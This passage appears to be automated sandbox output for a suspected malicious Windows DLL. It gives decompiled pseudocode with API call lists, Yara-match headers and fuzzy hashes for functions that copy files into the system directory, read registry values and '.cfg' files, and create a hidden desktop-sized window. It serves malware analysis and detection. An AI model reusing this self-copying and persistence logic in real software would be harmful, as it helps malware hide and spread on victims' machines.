                  								if(_t120 != 3) {
                  									__eflags = _t120 - 4;
                  									if(_t120 != 4) {
                  										__eflags = _t120 - 5;
                  										if(_t120 == 5) {
                  											E10005324( &_v12);
                  										}
                  									} else {
                  										E10005664( &_v5556);
                  										E100038E0( &_v5560, 0x105,  &_v5556);
                  										E10003988( &_v12, E10009E70, _v5560, __eflags);
                  									}
                  								} else {
                  									E10005638( &_v5024, _t291, _t293);
                  									__eflags = 0;
                  									E10003A34(_v5024, 0);
                  									if(__eflags == 0) {
                  										E10005664( &_v5556);
                  										E100038E0( &_v5032, 0x105,  &_v5556);
                  										E10003988( &_v12, E10009E70, _v5032, __eflags);
                  									} else {
                  										E10005638( &_v5028, _t291, _t293);
                  										E10003988( &_v12, E10009E70, _v5028, __eflags);
                  									}
                  								}
                  							} else {
                  								E10005460( &_v12, _t218, _t224, __eflags);
                  							}
                  						} else {
                  							E100053D8( &_v12, _t218, __eflags);
                  						}
                  					} else {
                  						E10005350( &_v12, _t218, _t301);
                  					}
                  					E100034B0( &_v5564, 0x3d,  &_v2124);
                  					_t302 = _v5564;
                  					if(_t302 != 0) {
                  						_push(_v12);
                  						E100038E0( &_v5568, 0x3d,  &_v2124);
                  						_push(_v5568);
                  						_push(E10009E70);
                  						E100039EC();
                  					}
                  					E100038E0( &_v5576, 0x3d,  &_v2246);
                  					E10003988( &_v5572, _v5576, _v12, _t302);
                  					E10003A34(_v8, _v5572);
                  					if(_t302 != 0) {
                  						_t131 = E10005690(E1000390C(_v12));
                  						_t303 = _t131;
                  						if(_t131 != 0) {
                  							E100038E0( &_v5584, 0x3d,  &_v2246);
                  							E10003988( &_v5580, _v5584, _v12, _t303);
                  							SetFileAttributesW(E1000390C(_v5580), 0x80);
                  							E100038E0( &_v5592, 0x3d,  &_v2246);
                  							E10003988( &_v5588, _v5592, _v12, _t303);
                  							_t144 = E1000390C(_v5588);
                  							_t294 = E1000390C(_v8);
                  							_t147 = CopyFileW(_t294, _t144, 0);
                  							asm("sbb eax, eax");
                  							_t305 = _t147 + 1;
                  							if(_t147 + 1 != 0) {
                  								E100038E0( &_v5628, 0x3d,  &_v2246);
                  								E10003988(_t218, _v5628, _v12, __eflags);
                  							} else {
                  								E10005664( &_v5556);
                  								E100038E0( &_v5596, 0x105,  &_v5556);
                  								E10003988( &_v12, E10009E70, _v5596, _t305);
                  								E100034B0( &_v5600, 0x3d,  &_v2124);
                  								if(_v5600 != 0) {
                  									_push(_v12);
                  									E100038E0( &_v5604, 0x3d,  &_v2124);
                  									_push(_v5604);
                  									_push(E10009E70);
                  									E100039EC();
                  								}
                  								_t163 = E10005690(E1000390C(_v12));
                  								_t307 = _t163;
                  								if(_t163 != 0) {
                  									E100038E0( &_v5612, 0x3d,  &_v2246);
                  									E10003988( &_v5608, _v5612, _v12, _t307);
                  									SetFileAttributesW(E1000390C(_v5608), 0x80);
                  									E100038E0( &_v5620, 0x3d,  &_v2246);
                  									E10003988( &_v5616, _v5620, _v12, _t307);
                  									_t177 = CopyFileW(_t294, E1000390C(_v5616), 0);
                  									asm("sbb eax, eax");
                  									_t309 = _t177 + 1;
                  									if(_t177 + 1 != 0) {
                  										E100038E0( &_v5624, 0x3d,  &_v2246);
                  										E10003988(_t218, _v5624, _v12, _t309);
                  									}
                  								}
                  							}
                  						}
                  					}
                  					goto L28;
                  				}
                  			}

                  0x100099f9
                  0x100099fc
                  0x10009a01
                  0x10009a01
                  0x10009a03
                  0x10009a05
                  0x10009a05
                  0x10009a08
                  0x10009a09
                  0x10009a09
                  0x10009a0f
                  0x10009a17
                  0x10009a1d
                  0x10009a1d
                  0x10009a1f
                  0x10009a20
                  0x10009a22
                  0x10009a28
                  0x10009a2f
                  0x10009a30
                  0x10009a35
                  0x10009a38
                  0x10009a40
                  0x10009a4c
                  0x10009df2
                  0x10009df4
                  0x10009df7
                  0x10009dfa
                  0x10009e0a
                  0x10009e15
                  0x10009e25
                  0x10009e30
                  0x10009e3b
                  0x10009e4b
                  0x10009e5d
                  0x10009a52
                  0x10009a52
                  0x10009a58
                  0x10009a5a
                  0x10009a69
                  0x10009a6c
                  0x10009a7b
                  0x10009a7e
                  0x10009a8d
                  0x10009a90
                  0x10009b02
                  0x10009b05
                  0x10009b3d
                  0x10009b40
                  0x10009b45
                  0x10009b45
                  0x10009b07
                  0x10009b0d
                  0x10009b23
                  0x10009b36
                  0x10009b36
                  0x10009a92
                  0x10009a98
                  0x10009aa3
                  0x10009aa5
                  0x10009aaa
                  0x10009ad2
                  0x10009ae8
                  0x10009afb
                  0x10009aac
                  0x10009ab2
                  0x10009ac5
                  0x10009ac5
                  0x10009aaa
                  0x10009a80
                  0x10009a83
                  0x10009a83
                  0x10009a6e
                  0x10009a71
                  0x10009a71
                  0x10009a5c
                  0x10009a5f
                  0x10009a5f
                  0x10009b5b
                  0x10009b60
                  0x10009b67
                  0x10009b69
                  0x10009b7d
                  0x10009b82
                  0x10009b88
                  0x10009b95
                  0x10009b95
                  0x10009bab
                  0x10009bbf
                  0x10009bcd
                  0x10009bd2
                  0x10009be0
                  0x10009be5
                  0x10009be7
                  0x10009c03
                  0x10009c17
                  0x10009c28
                  0x10009c40
                  0x10009c54
                  0x10009c5f
                  0x10009c6d
                  0x10009c70
                  0x10009c78
                  0x10009c7b
                  0x10009c7d
                  0x10009ddd
                  0x10009ded
                  0x10009c83
                  0x10009c89
                  0x10009c9f
                  0x10009cb2
                  0x10009cc8
                  0x10009cd4
                  0x10009cd6
                  0x10009cea
                  0x10009cef
                  0x10009cf5
                  0x10009d02
                  0x10009d02
                  0x10009d0f
                  0x10009d14
                  0x10009d16
                  0x10009d32
                  0x10009d46
                  0x10009d57
                  0x10009d6f
                  0x10009d83
                  0x10009d95
                  0x10009d9d
                  0x10009da0
                  0x10009da2
                  0x10009db5
                  0x10009dc5
                  0x10009dc5
                  0x10009da2
                  0x10009d16
                  0x10009c7d
                  0x10009be7
                  0x00000000
                  0x10009bd2

                  APIs
                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 10009C28
                  • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,00000080), ref: 10009C70
                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,00000000,00000000,00000000,00000000,00000080), ref: 10009D57
                  • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,00000080,?,?,?,?,00000000,00000000,00000000,00000000,00000080), ref: 10009D95
                    • Part of subcall function 100053D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 10005406
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: File$AttributesCopy$DirectorySystem
                  • String ID:
                  • API String ID: 3443914049-0
                  • Opcode ID: 8ffb02acb12784a8fca7f00c8f7b14851c1630e5a7bcf1fe24323b8a2b1ac29b
                  • Instruction ID: 24b82f3418a54abe61ddf0e4c7a52c3359c66f211f63a1d8d7c84fd7e5013851
                  • Opcode Fuzzy Hash: 8ffb02acb12784a8fca7f00c8f7b14851c1630e5a7bcf1fe24323b8a2b1ac29b
                  • Instruction Fuzzy Hash: 02B12F3890455DDBEB21DB50CC81ADEB3B9EF803C1F4081E5A44AAB289DB71AF85CF51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			E1000553C(void* __eax, void* __ebx, char __ecx, char __edx, void* __esi, intOrPtr* _a4, char _a8) {
                  				char _v8;
                  				char _v12;
                  				void* _v16;
                  				int _v20;
                  				int _v24;
                  				intOrPtr _t67;
                  				signed int _t70;
                  				void* _t74;
                  				short* _t75;
                  				void* _t78;
                  				long _t81;
                  
                  				_v12 = __ecx;
                  				_v8 = __edx;
                  				_t74 = __eax;
                  				_t61 = _a4;
                  				E10003C28( &_v8);
                  				E10003C28( &_v12);
                  				E10003C28( &_a8);
                  				_push(_t78);
                  				_push(0x10005628);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t78 + 0xffffffec;
                  				E100037AC(_a4, _a8);
                  				if(RegOpenKeyExW(_t74, E1000390C(_v8), 0, 1,  &_v16) == 0) {
                  					_t75 = E1000390C(_v12);
                  					_t81 = RegQueryValueExW(_v16, _t75, 0,  &_v20, 0,  &_v24);
                  					if(_t81 == 0) {
                  						_t70 = _v24 >> 1;
                  						if(_t81 < 0) {
                  							asm("adc edx, 0x0");
                  						}
                  						E10003BE4(_t61, _t70);
                  						RegQueryValueExW(_v16, _t75, 0,  &_v20, E1000390C( *_t61),  &_v24);
                  						E10003BE4(_t61, E1000391C( *_t61) - 1);
                  					}
                  					RegCloseKey(_v16);
                  				}
                  				_pop(_t67);
                  				 *[fs:eax] = _t67;
                  				_push(E1000562F);
                  				E10003788( &_v12, 2);
                  				return E10003770( &_a8);
                  			}

                  0x10005544
                  0x10005547
                  0x1000554a
                  0x1000554c
                  0x10005552
                  0x1000555a
                  0x10005562
                  0x10005569
                  0x1000556a
                  0x1000556f
                  0x10005572
                  0x1000557a
                  0x10005598
                  0x100055ae
                  0x100055ba
                  0x100055bc
                  0x100055c1
                  0x100055c3
                  0x100055c5
                  0x100055c5
                  0x100055ca
                  0x100055e6
                  0x100055f7
                  0x100055f7
                  0x10005600
                  0x10005600
                  0x10005607
                  0x1000560a
                  0x1000560d
                  0x1000561a
                  0x10005627

                  APIs
                    • Part of subcall function 10003C28: SysAllocStringLen.OLEAUT32(CONFIG,?), ref: 10003C36
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,10005628,?,1000F834,?), ref: 10005591
                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,10005628,?,1000F834,?), ref: 100055B5
                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 100055E6
                  • RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,10005628,?,1000F834), ref: 10005600
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: AllocQueryStringValue$CloseOpen
                  • String ID:
                  • API String ID: 1380265509-0
                  • Opcode ID: 44f5328e4876b6f52479c3c45a49cad434a2d2e4ded6db1d1893a13467945e67
                  • Instruction ID: 9e8535e9bd190b0497b11441725f9f23fe9a8eb8553ebcc7748c6e293a187153
                  • Opcode Fuzzy Hash: 44f5328e4876b6f52479c3c45a49cad434a2d2e4ded6db1d1893a13467945e67
                  • Instruction Fuzzy Hash: 3621FC75A04618ABFB01DBA8CC82EAF77ECEF44280F518561B504E7259EB71EE048B55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E10006510(intOrPtr __ecx, char __edx, intOrPtr _a4) {
                  				char _v5;
                  				struct tagRECT _v21;
                  				struct _WNDCLASSW _v61;
                  				void* __ebp;
                  				void* _t23;
                  				intOrPtr _t24;
                  				void* _t43;
                  				void* _t47;
                  				intOrPtr _t48;
                  				char _t50;
                  				void* _t54;
                  				void* _t55;
                  
                  				_t50 = __edx;
                  				_t48 = __ecx;
                  				if(__edx != 0) {
                  					_t55 = _t55 + 0xfffffff0;
                  					_t23 = E10002A34(_t23, _t54);
                  				}
                  				_v5 = _t50;
                  				_t47 = _t23;
                  				_t24 = _a4;
                  				 *((intOrPtr*)(_t47 + 0xc)) = _t48;
                  				_v61.style = 0;
                  				if(_t24 != 0) {
                  					_v61.lpfnWndProc = _t24;
                  				} else {
                  					_v61.lpfnWndProc = E100064F4;
                  				}
                  				_v61.cbClsExtra = 0;
                  				_v61.cbWndExtra = 0;
                  				_v61.hInstance = 0;
                  				_v61.hIcon = 0;
                  				_v61.hCursor = 0;
                  				_v61.hbrBackground = 0;
                  				_v61.lpszMenuName = 0;
                  				_t53 = _t48;
                  				_v61.lpszClassName = _t48;
                  				GetWindowRect(GetDesktopWindow(),  &_v21);
                  				 *((intOrPtr*)(_t47 + 8)) = GetModuleHandleA(0);
                  				RegisterClassW( &_v61);
                  				_t20 = _t47 + 8; // 0xc08b7463
                  				 *((intOrPtr*)(_t47 + 4)) = E10005148(0x80, _t53, 0,  *_t20, 0, 0, 0, 0, _v21.bottom, _v21.right, 0x98000000);
                  				_t43 = _t47;
                  				if(_v5 != 0) {
                  					E10002A8C(_t43);
                  					_pop( *[fs:0x0]);
                  				}
                  				return _t47;
                  			}

                  0x10006510
                  0x10006510
                  0x1000651a
                  0x1000651c
                  0x1000651f
                  0x1000651f
                  0x10006524
                  0x10006527
                  0x10006529
                  0x1000652c
                  0x10006531
                  0x10006536
                  0x10006542
                  0x10006538
                  0x1000653d
                  0x1000653d
                  0x10006547
                  0x1000654c
                  0x10006551
                  0x10006556
                  0x1000655b
                  0x10006560
                  0x10006565
                  0x10006568
                  0x1000656a
                  0x10006577
                  0x10006583
                  0x1000658a
                  0x100065a4
                  0x100065bb
                  0x100065be
                  0x100065c4
                  0x100065c6
                  0x100065cb
                  0x100065d2
                  0x100065dc

                  APIs
                  • GetDesktopWindow.USER32 ref: 10006571
                  • GetWindowRect.USER32 ref: 10006577
                  • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?), ref: 1000657E
                  • RegisterClassW.USER32 ref: 1000658A
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Window$ClassDesktopHandleModuleRectRegister
                  • String ID:
                  • API String ID: 805957598-0
                  • Opcode ID: a1c04505e5f5ba05ad93ee47a5be074ea14fb600836cbdd66e1b4b0242f25109
                  • Instruction ID: fd61cd8fe43509876bed775ba568f59b673aa19b24296d0bc6aff4bc23203f03
                  • Opcode Fuzzy Hash: a1c04505e5f5ba05ad93ee47a5be074ea14fb600836cbdd66e1b4b0242f25109
                  • Instruction Fuzzy Hash: AB2147B1F44205AFEB50CFB8DC41B9FB7E6EB08291F108075F508EB285E97195048794
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E1000ACD4(intOrPtr _a4, short _a6, intOrPtr _a8) {
                  				struct _WNDCLASSA _v44;
                  				struct HINSTANCE__* _t6;
                  				CHAR* _t8;
                  				struct HINSTANCE__* _t9;
                  				int _t10;
                  				void* _t11;
                  				struct HINSTANCE__* _t13;
                  				struct HINSTANCE__* _t19;
                  				CHAR* _t20;
                  				struct HWND__* _t22;
                  				CHAR* _t24;
                  
                  				_t6 =  *0x1000f654; // 0x10000000
                  				 *0x1000e0d0 = _t6;
                  				_t8 =  *0x1000e0e4; // 0x1000ac04
                  				_t9 =  *0x1000f654; // 0x10000000
                  				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
                  				asm("sbb eax, eax");
                  				_t11 = _t10 + 1;
                  				if(_t11 == 0 || L10004FE0 != _v44.lpfnWndProc) {
                  					if(_t11 != 0) {
                  						_t19 =  *0x1000f654; // 0x10000000
                  						_t20 =  *0x1000e0e4; // 0x1000ac04
                  						UnregisterClassA(_t20, _t19);
                  					}
                  					RegisterClassA(0x1000e0c0);
                  				}
                  				_t13 =  *0x1000f654; // 0x10000000
                  				_t24 =  *0x1000e0e4; // 0x1000ac04
                  				_t22 = E100050F0(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
                  				if(_a6 != 0) {
                  					SetWindowLongA(_t22, 0xfffffffc, E1000AC3C(_a4, _a8));
                  				}
                  				return _t22;
                  			}

                  0x1000acdb
                  0x1000ace0
                  0x1000ace9
                  0x1000acef
                  0x1000acf5
                  0x1000acfd
                  0x1000acff
                  0x1000ad02
                  0x1000ad10
                  0x1000ad12
                  0x1000ad18
                  0x1000ad1e
                  0x1000ad1e
                  0x1000ad28
                  0x1000ad28
                  0x1000ad3e
                  0x1000ad4b
                  0x1000ad5b
                  0x1000ad62
                  0x1000ad73
                  0x1000ad73
                  0x1000ad7e

                  APIs
                  • GetClassInfoA.USER32 ref: 1000ACF5
                  • UnregisterClassA.USER32 ref: 1000AD1E
                  • RegisterClassA.USER32 ref: 1000AD28
                  • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 1000AD73
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Class$InfoLongRegisterUnregisterWindow
                  • String ID:
                  • API String ID: 4025006896-0
                  • Opcode ID: 34ace1d3d250000ade5f731cbe714df2434c88e76e583f532eec8fd86c63c607
                  • Instruction ID: a184255e0aa6b19b8a700ba1ba5d869a571dd8ac557c0204472f9db7938aee9a
                  • Opcode Fuzzy Hash: 34ace1d3d250000ade5f731cbe714df2434c88e76e583f532eec8fd86c63c607
                  • Instruction Fuzzy Hash: DE01C4716041146BFB40DBA8CC91FAE33ADE7193C1F004722F505E76ADCA76EC848790
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 67%
                  			E10001840() {
                  				signed int _t13;
                  				intOrPtr _t19;
                  				intOrPtr _t20;
                  				intOrPtr _t23;
                  
                  				_push(_t23);
                  				_push(E100018F6);
                  				_push( *[fs:edx]);
                  				 *[fs:edx] = _t23;
                  				_push(0x1000f5b8);
                  				L10001194();
                  				if( *0x1000f039 != 0) {
                  					_push(0x1000f5b8);
                  					L1000119C();
                  				}
                  				E10001204(0x1000f5d8);
                  				E10001204(0x1000f5e8);
                  				E10001204(0x1000f614);
                  				 *0x1000f610 = LocalAlloc(0, 0xff8);
                  				if( *0x1000f610 != 0) {
                  					_t13 = 3;
                  					do {
                  						_t20 =  *0x1000f610; // 0x0
                  						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                  						_t13 = _t13 + 1;
                  					} while (_t13 != 0x401);
                  					 *((intOrPtr*)(0x1000f5fc)) = 0x1000f5f8;
                  					 *0x1000f5f8 = 0x1000f5f8;
                  					 *0x1000f604 = 0x1000f5f8;
                  					 *0x1000f5b0 = 1;
                  				}
                  				_pop(_t19);
                  				 *[fs:eax] = _t19;
                  				_push(E100018FD);
                  				if( *0x1000f039 != 0) {
                  					_push(0x1000f5b8);
                  					L100011A4();
                  					return 0;
                  				}
                  				return 0;
                  			}







                  Instruction addresses: 0x10001845, 0x10001846, 0x1000184b, 0x1000184e, 0x10001851, 0x10001856, 0x10001862, 0x10001864, 0x10001869, 0x10001869, 0x10001873, 0x1000187d, 0x10001887, 0x10001898, 0x100018a4, 0x100018a6, 0x100018ab, 0x100018ab, 0x100018b3, 0x100018b7, 0x100018b8, 0x100018c4, 0x100018c7, 0x100018c9, 0x100018ce, 0x100018ce, 0x100018d7, 0x100018da, 0x100018dd, 0x100018e9, 0x100018eb, 0x100018f0, 0x00000000, 0x100018f0, 0x100018f5

                  APIs
                  • RtlInitializeCriticalSection.KERNEL32(1000F5B8,00000000,100018F6,?,?,100020DA,00000000,?,00000000,?,?,10001AC9,10001ADE,10001C2F), ref: 10001856
                  • RtlEnterCriticalSection.KERNEL32(1000F5B8,1000F5B8,00000000,100018F6,?,?,100020DA,00000000,?,00000000,?,?,10001AC9,10001ADE,10001C2F), ref: 10001869
                  • LocalAlloc.KERNEL32(00000000,00000FF8,1000F5B8,00000000,100018F6,?,?,100020DA,00000000,?,00000000,?,?,10001AC9,10001ADE,10001C2F), ref: 10001893
                  • RtlLeaveCriticalSection.KERNEL32(1000F5B8,100018FD,00000000,100018F6,?,?,100020DA,00000000,?,00000000,?,?,10001AC9,10001ADE,10001C2F), ref: 100018F0
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                  • String ID:
                  • API String ID: 730355536-0
                  • Opcode ID: 1f0f36669ccd89084293deb5fed76b485fb911eb23b4b8d51be7619dbd263ba8
                  • Instruction ID: dccb1d46fb8802896221657e2b19eaefe2a155e583b8e496b0545f4226b1fe46
                  • Opcode Fuzzy Hash: 1f0f36669ccd89084293deb5fed76b485fb911eb23b4b8d51be7619dbd263ba8
                  • Instruction Fuzzy Hash: 1101C0B49046909EF706DF688C417F83A95EB493C2F84807DE31086EAECF755541E715
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E10005E30(WCHAR* __eax, void** __edx) {
                  				long _v12;
                  				struct _OVERLAPPED* _v16;
                  				long _v20;
                  				WCHAR* _t20;
                  				void* _t21;
                  				void** _t25;
                  
                  				_t25 = __edx;
                  				_t20 = __eax;
                  				_v20 = 0;
                  				_v16 = 0;
                  				 *((intOrPtr*)(__edx)) = 0;
                  				if(E10005CA4(__eax) != 0) {
                  					_t21 = CreateFileW(_t20, 0x80000000, 1, 0, 3, 0, 0);
                  					_v20 = GetFileSize(_t21, 0);
                  					_v16 = 0;
                  					 *_t25 = E10002500(_v20);
                  					ReadFile(_t21,  *_t25, _v20,  &_v12, 0);
                  					CloseHandle(_t21);
                  				}
                  				return _v20;
                  			}









                  Instruction addresses: 0x10005e35, 0x10005e37, 0x10005e39, 0x10005e40, 0x10005e4a, 0x10005e55, 0x10005e6c, 0x10005e78, 0x10005e7b, 0x10005e87, 0x10005e99, 0x10005e9f, 0x10005e9f, 0x10005eb0

                  APIs
                    • Part of subcall function 10005CA4: FindFirstFileW.KERNEL32(00000000,?,00000000,1000D3CA,.cfg,?,?,00000002,?,80000001,00000000,00008007,00000000,1000D759), ref: 10005CAF
                    • Part of subcall function 10005CA4: FindClose.KERNEL32(00000000,00000000,?,00000000,1000D3CA,.cfg,?,?,00000002,?,80000001,00000000,00008007,00000000,1000D759), ref: 10005CBC
                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E67
                  • GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E71
                  • ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E99
                  • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E9F
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: File$CloseFind$CreateFirstHandleReadSize
                  • String ID:
                  • API String ID: 2300874643-0
                  • Opcode ID: a79ddd87b365fe7b2d14b4ed1ecc161be50d9f5a748904592efd46580eade151
                  • Instruction ID: ec1664e735d5352034fe0f720539986a8c554a57553e37fb55f78792c2cbbe85
                  • Opcode Fuzzy Hash: a79ddd87b365fe7b2d14b4ed1ecc161be50d9f5a748904592efd46580eade151
                  • Instruction Fuzzy Hash: 7701FBB4204300AFF750DF68DC82F5BB7D8DF48740F118929B6C8DB2D6EAB5A8408756
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E1000CF04(WCHAR* __eax, void* __edx) {
                  				long _v12;
                  				struct _OVERLAPPED* _v16;
                  				long _v20;
                  				WCHAR* _t16;
                  				void* _t17;
                  				void* _t21;
                  
                  				_t21 = __edx;
                  				_t16 = __eax;
                  				_v20 = 0;
                  				_v16 = 0;
                  				if(E10005CA4(__eax) != 0) {
                  					_t17 = CreateFileW(_t16, 0x80000000, 1, 0, 3, 0, 0);
                  					_v20 = GetFileSize(_t17, 0);
                  					_v16 = 0;
                  					ReadFile(_t17, _t21, _v20,  &_v12, 0);
                  					CloseHandle(_t17);
                  				}
                  				return _v20;
                  			}









                  Instruction addresses: 0x1000cf09, 0x1000cf0b, 0x1000cf0d, 0x1000cf14, 0x1000cf25, 0x1000cf3c, 0x1000cf48, 0x1000cf4b, 0x1000cf5d, 0x1000cf63, 0x1000cf63, 0x1000cf74

                  APIs
                    • Part of subcall function 10005CA4: FindFirstFileW.KERNEL32(00000000,?,00000000,1000D3CA,.cfg,?,?,00000002,?,80000001,00000000,00008007,00000000,1000D759), ref: 10005CAF
                    • Part of subcall function 10005CA4: FindClose.KERNEL32(00000000,00000000,?,00000000,1000D3CA,.cfg,?,?,00000002,?,80000001,00000000,00008007,00000000,1000D759), ref: 10005CBC
                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 1000CF37
                  • GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 1000CF41
                  • ReadFile.KERNEL32(00000000,10012588,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 1000CF5D
                  • CloseHandle.KERNEL32(00000000,00000000,10012588,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 1000CF63
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: File$CloseFind$CreateFirstHandleReadSize
                  • String ID:
                  • API String ID: 2300874643-0
                  • Opcode ID: 03f9f7659b597f388d1b5840c8977d6936cd9482a483ede27655747325d3c647
                  • Instruction ID: 0a6ea64837ac90d6558c1ae8266d2dbde50220b88be3e9169680d92fb0307424
                  • Opcode Fuzzy Hash: 03f9f7659b597f388d1b5840c8977d6936cd9482a483ede27655747325d3c647
                  • Instruction Fuzzy Hash: 54F012B42443007EF710DB689CC2F5B77DDDF84790F118929B6889B2C6DAB5A8008756
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E10006024(struct tagMSG* __eax) {
                  				int _t6;
                  				MSG* _t7;
                  
                  				_t7 = __eax;
                  				_t6 = 0;
                  				if(PeekMessageA(__eax, 0, 0, 0, 1) != 0) {
                  					_t6 = 1;
                  					TranslateMessage(_t7);
                  					DispatchMessageA(_t7);
                  				}
                  				Sleep(5);
                  				return _t6;
                  			}





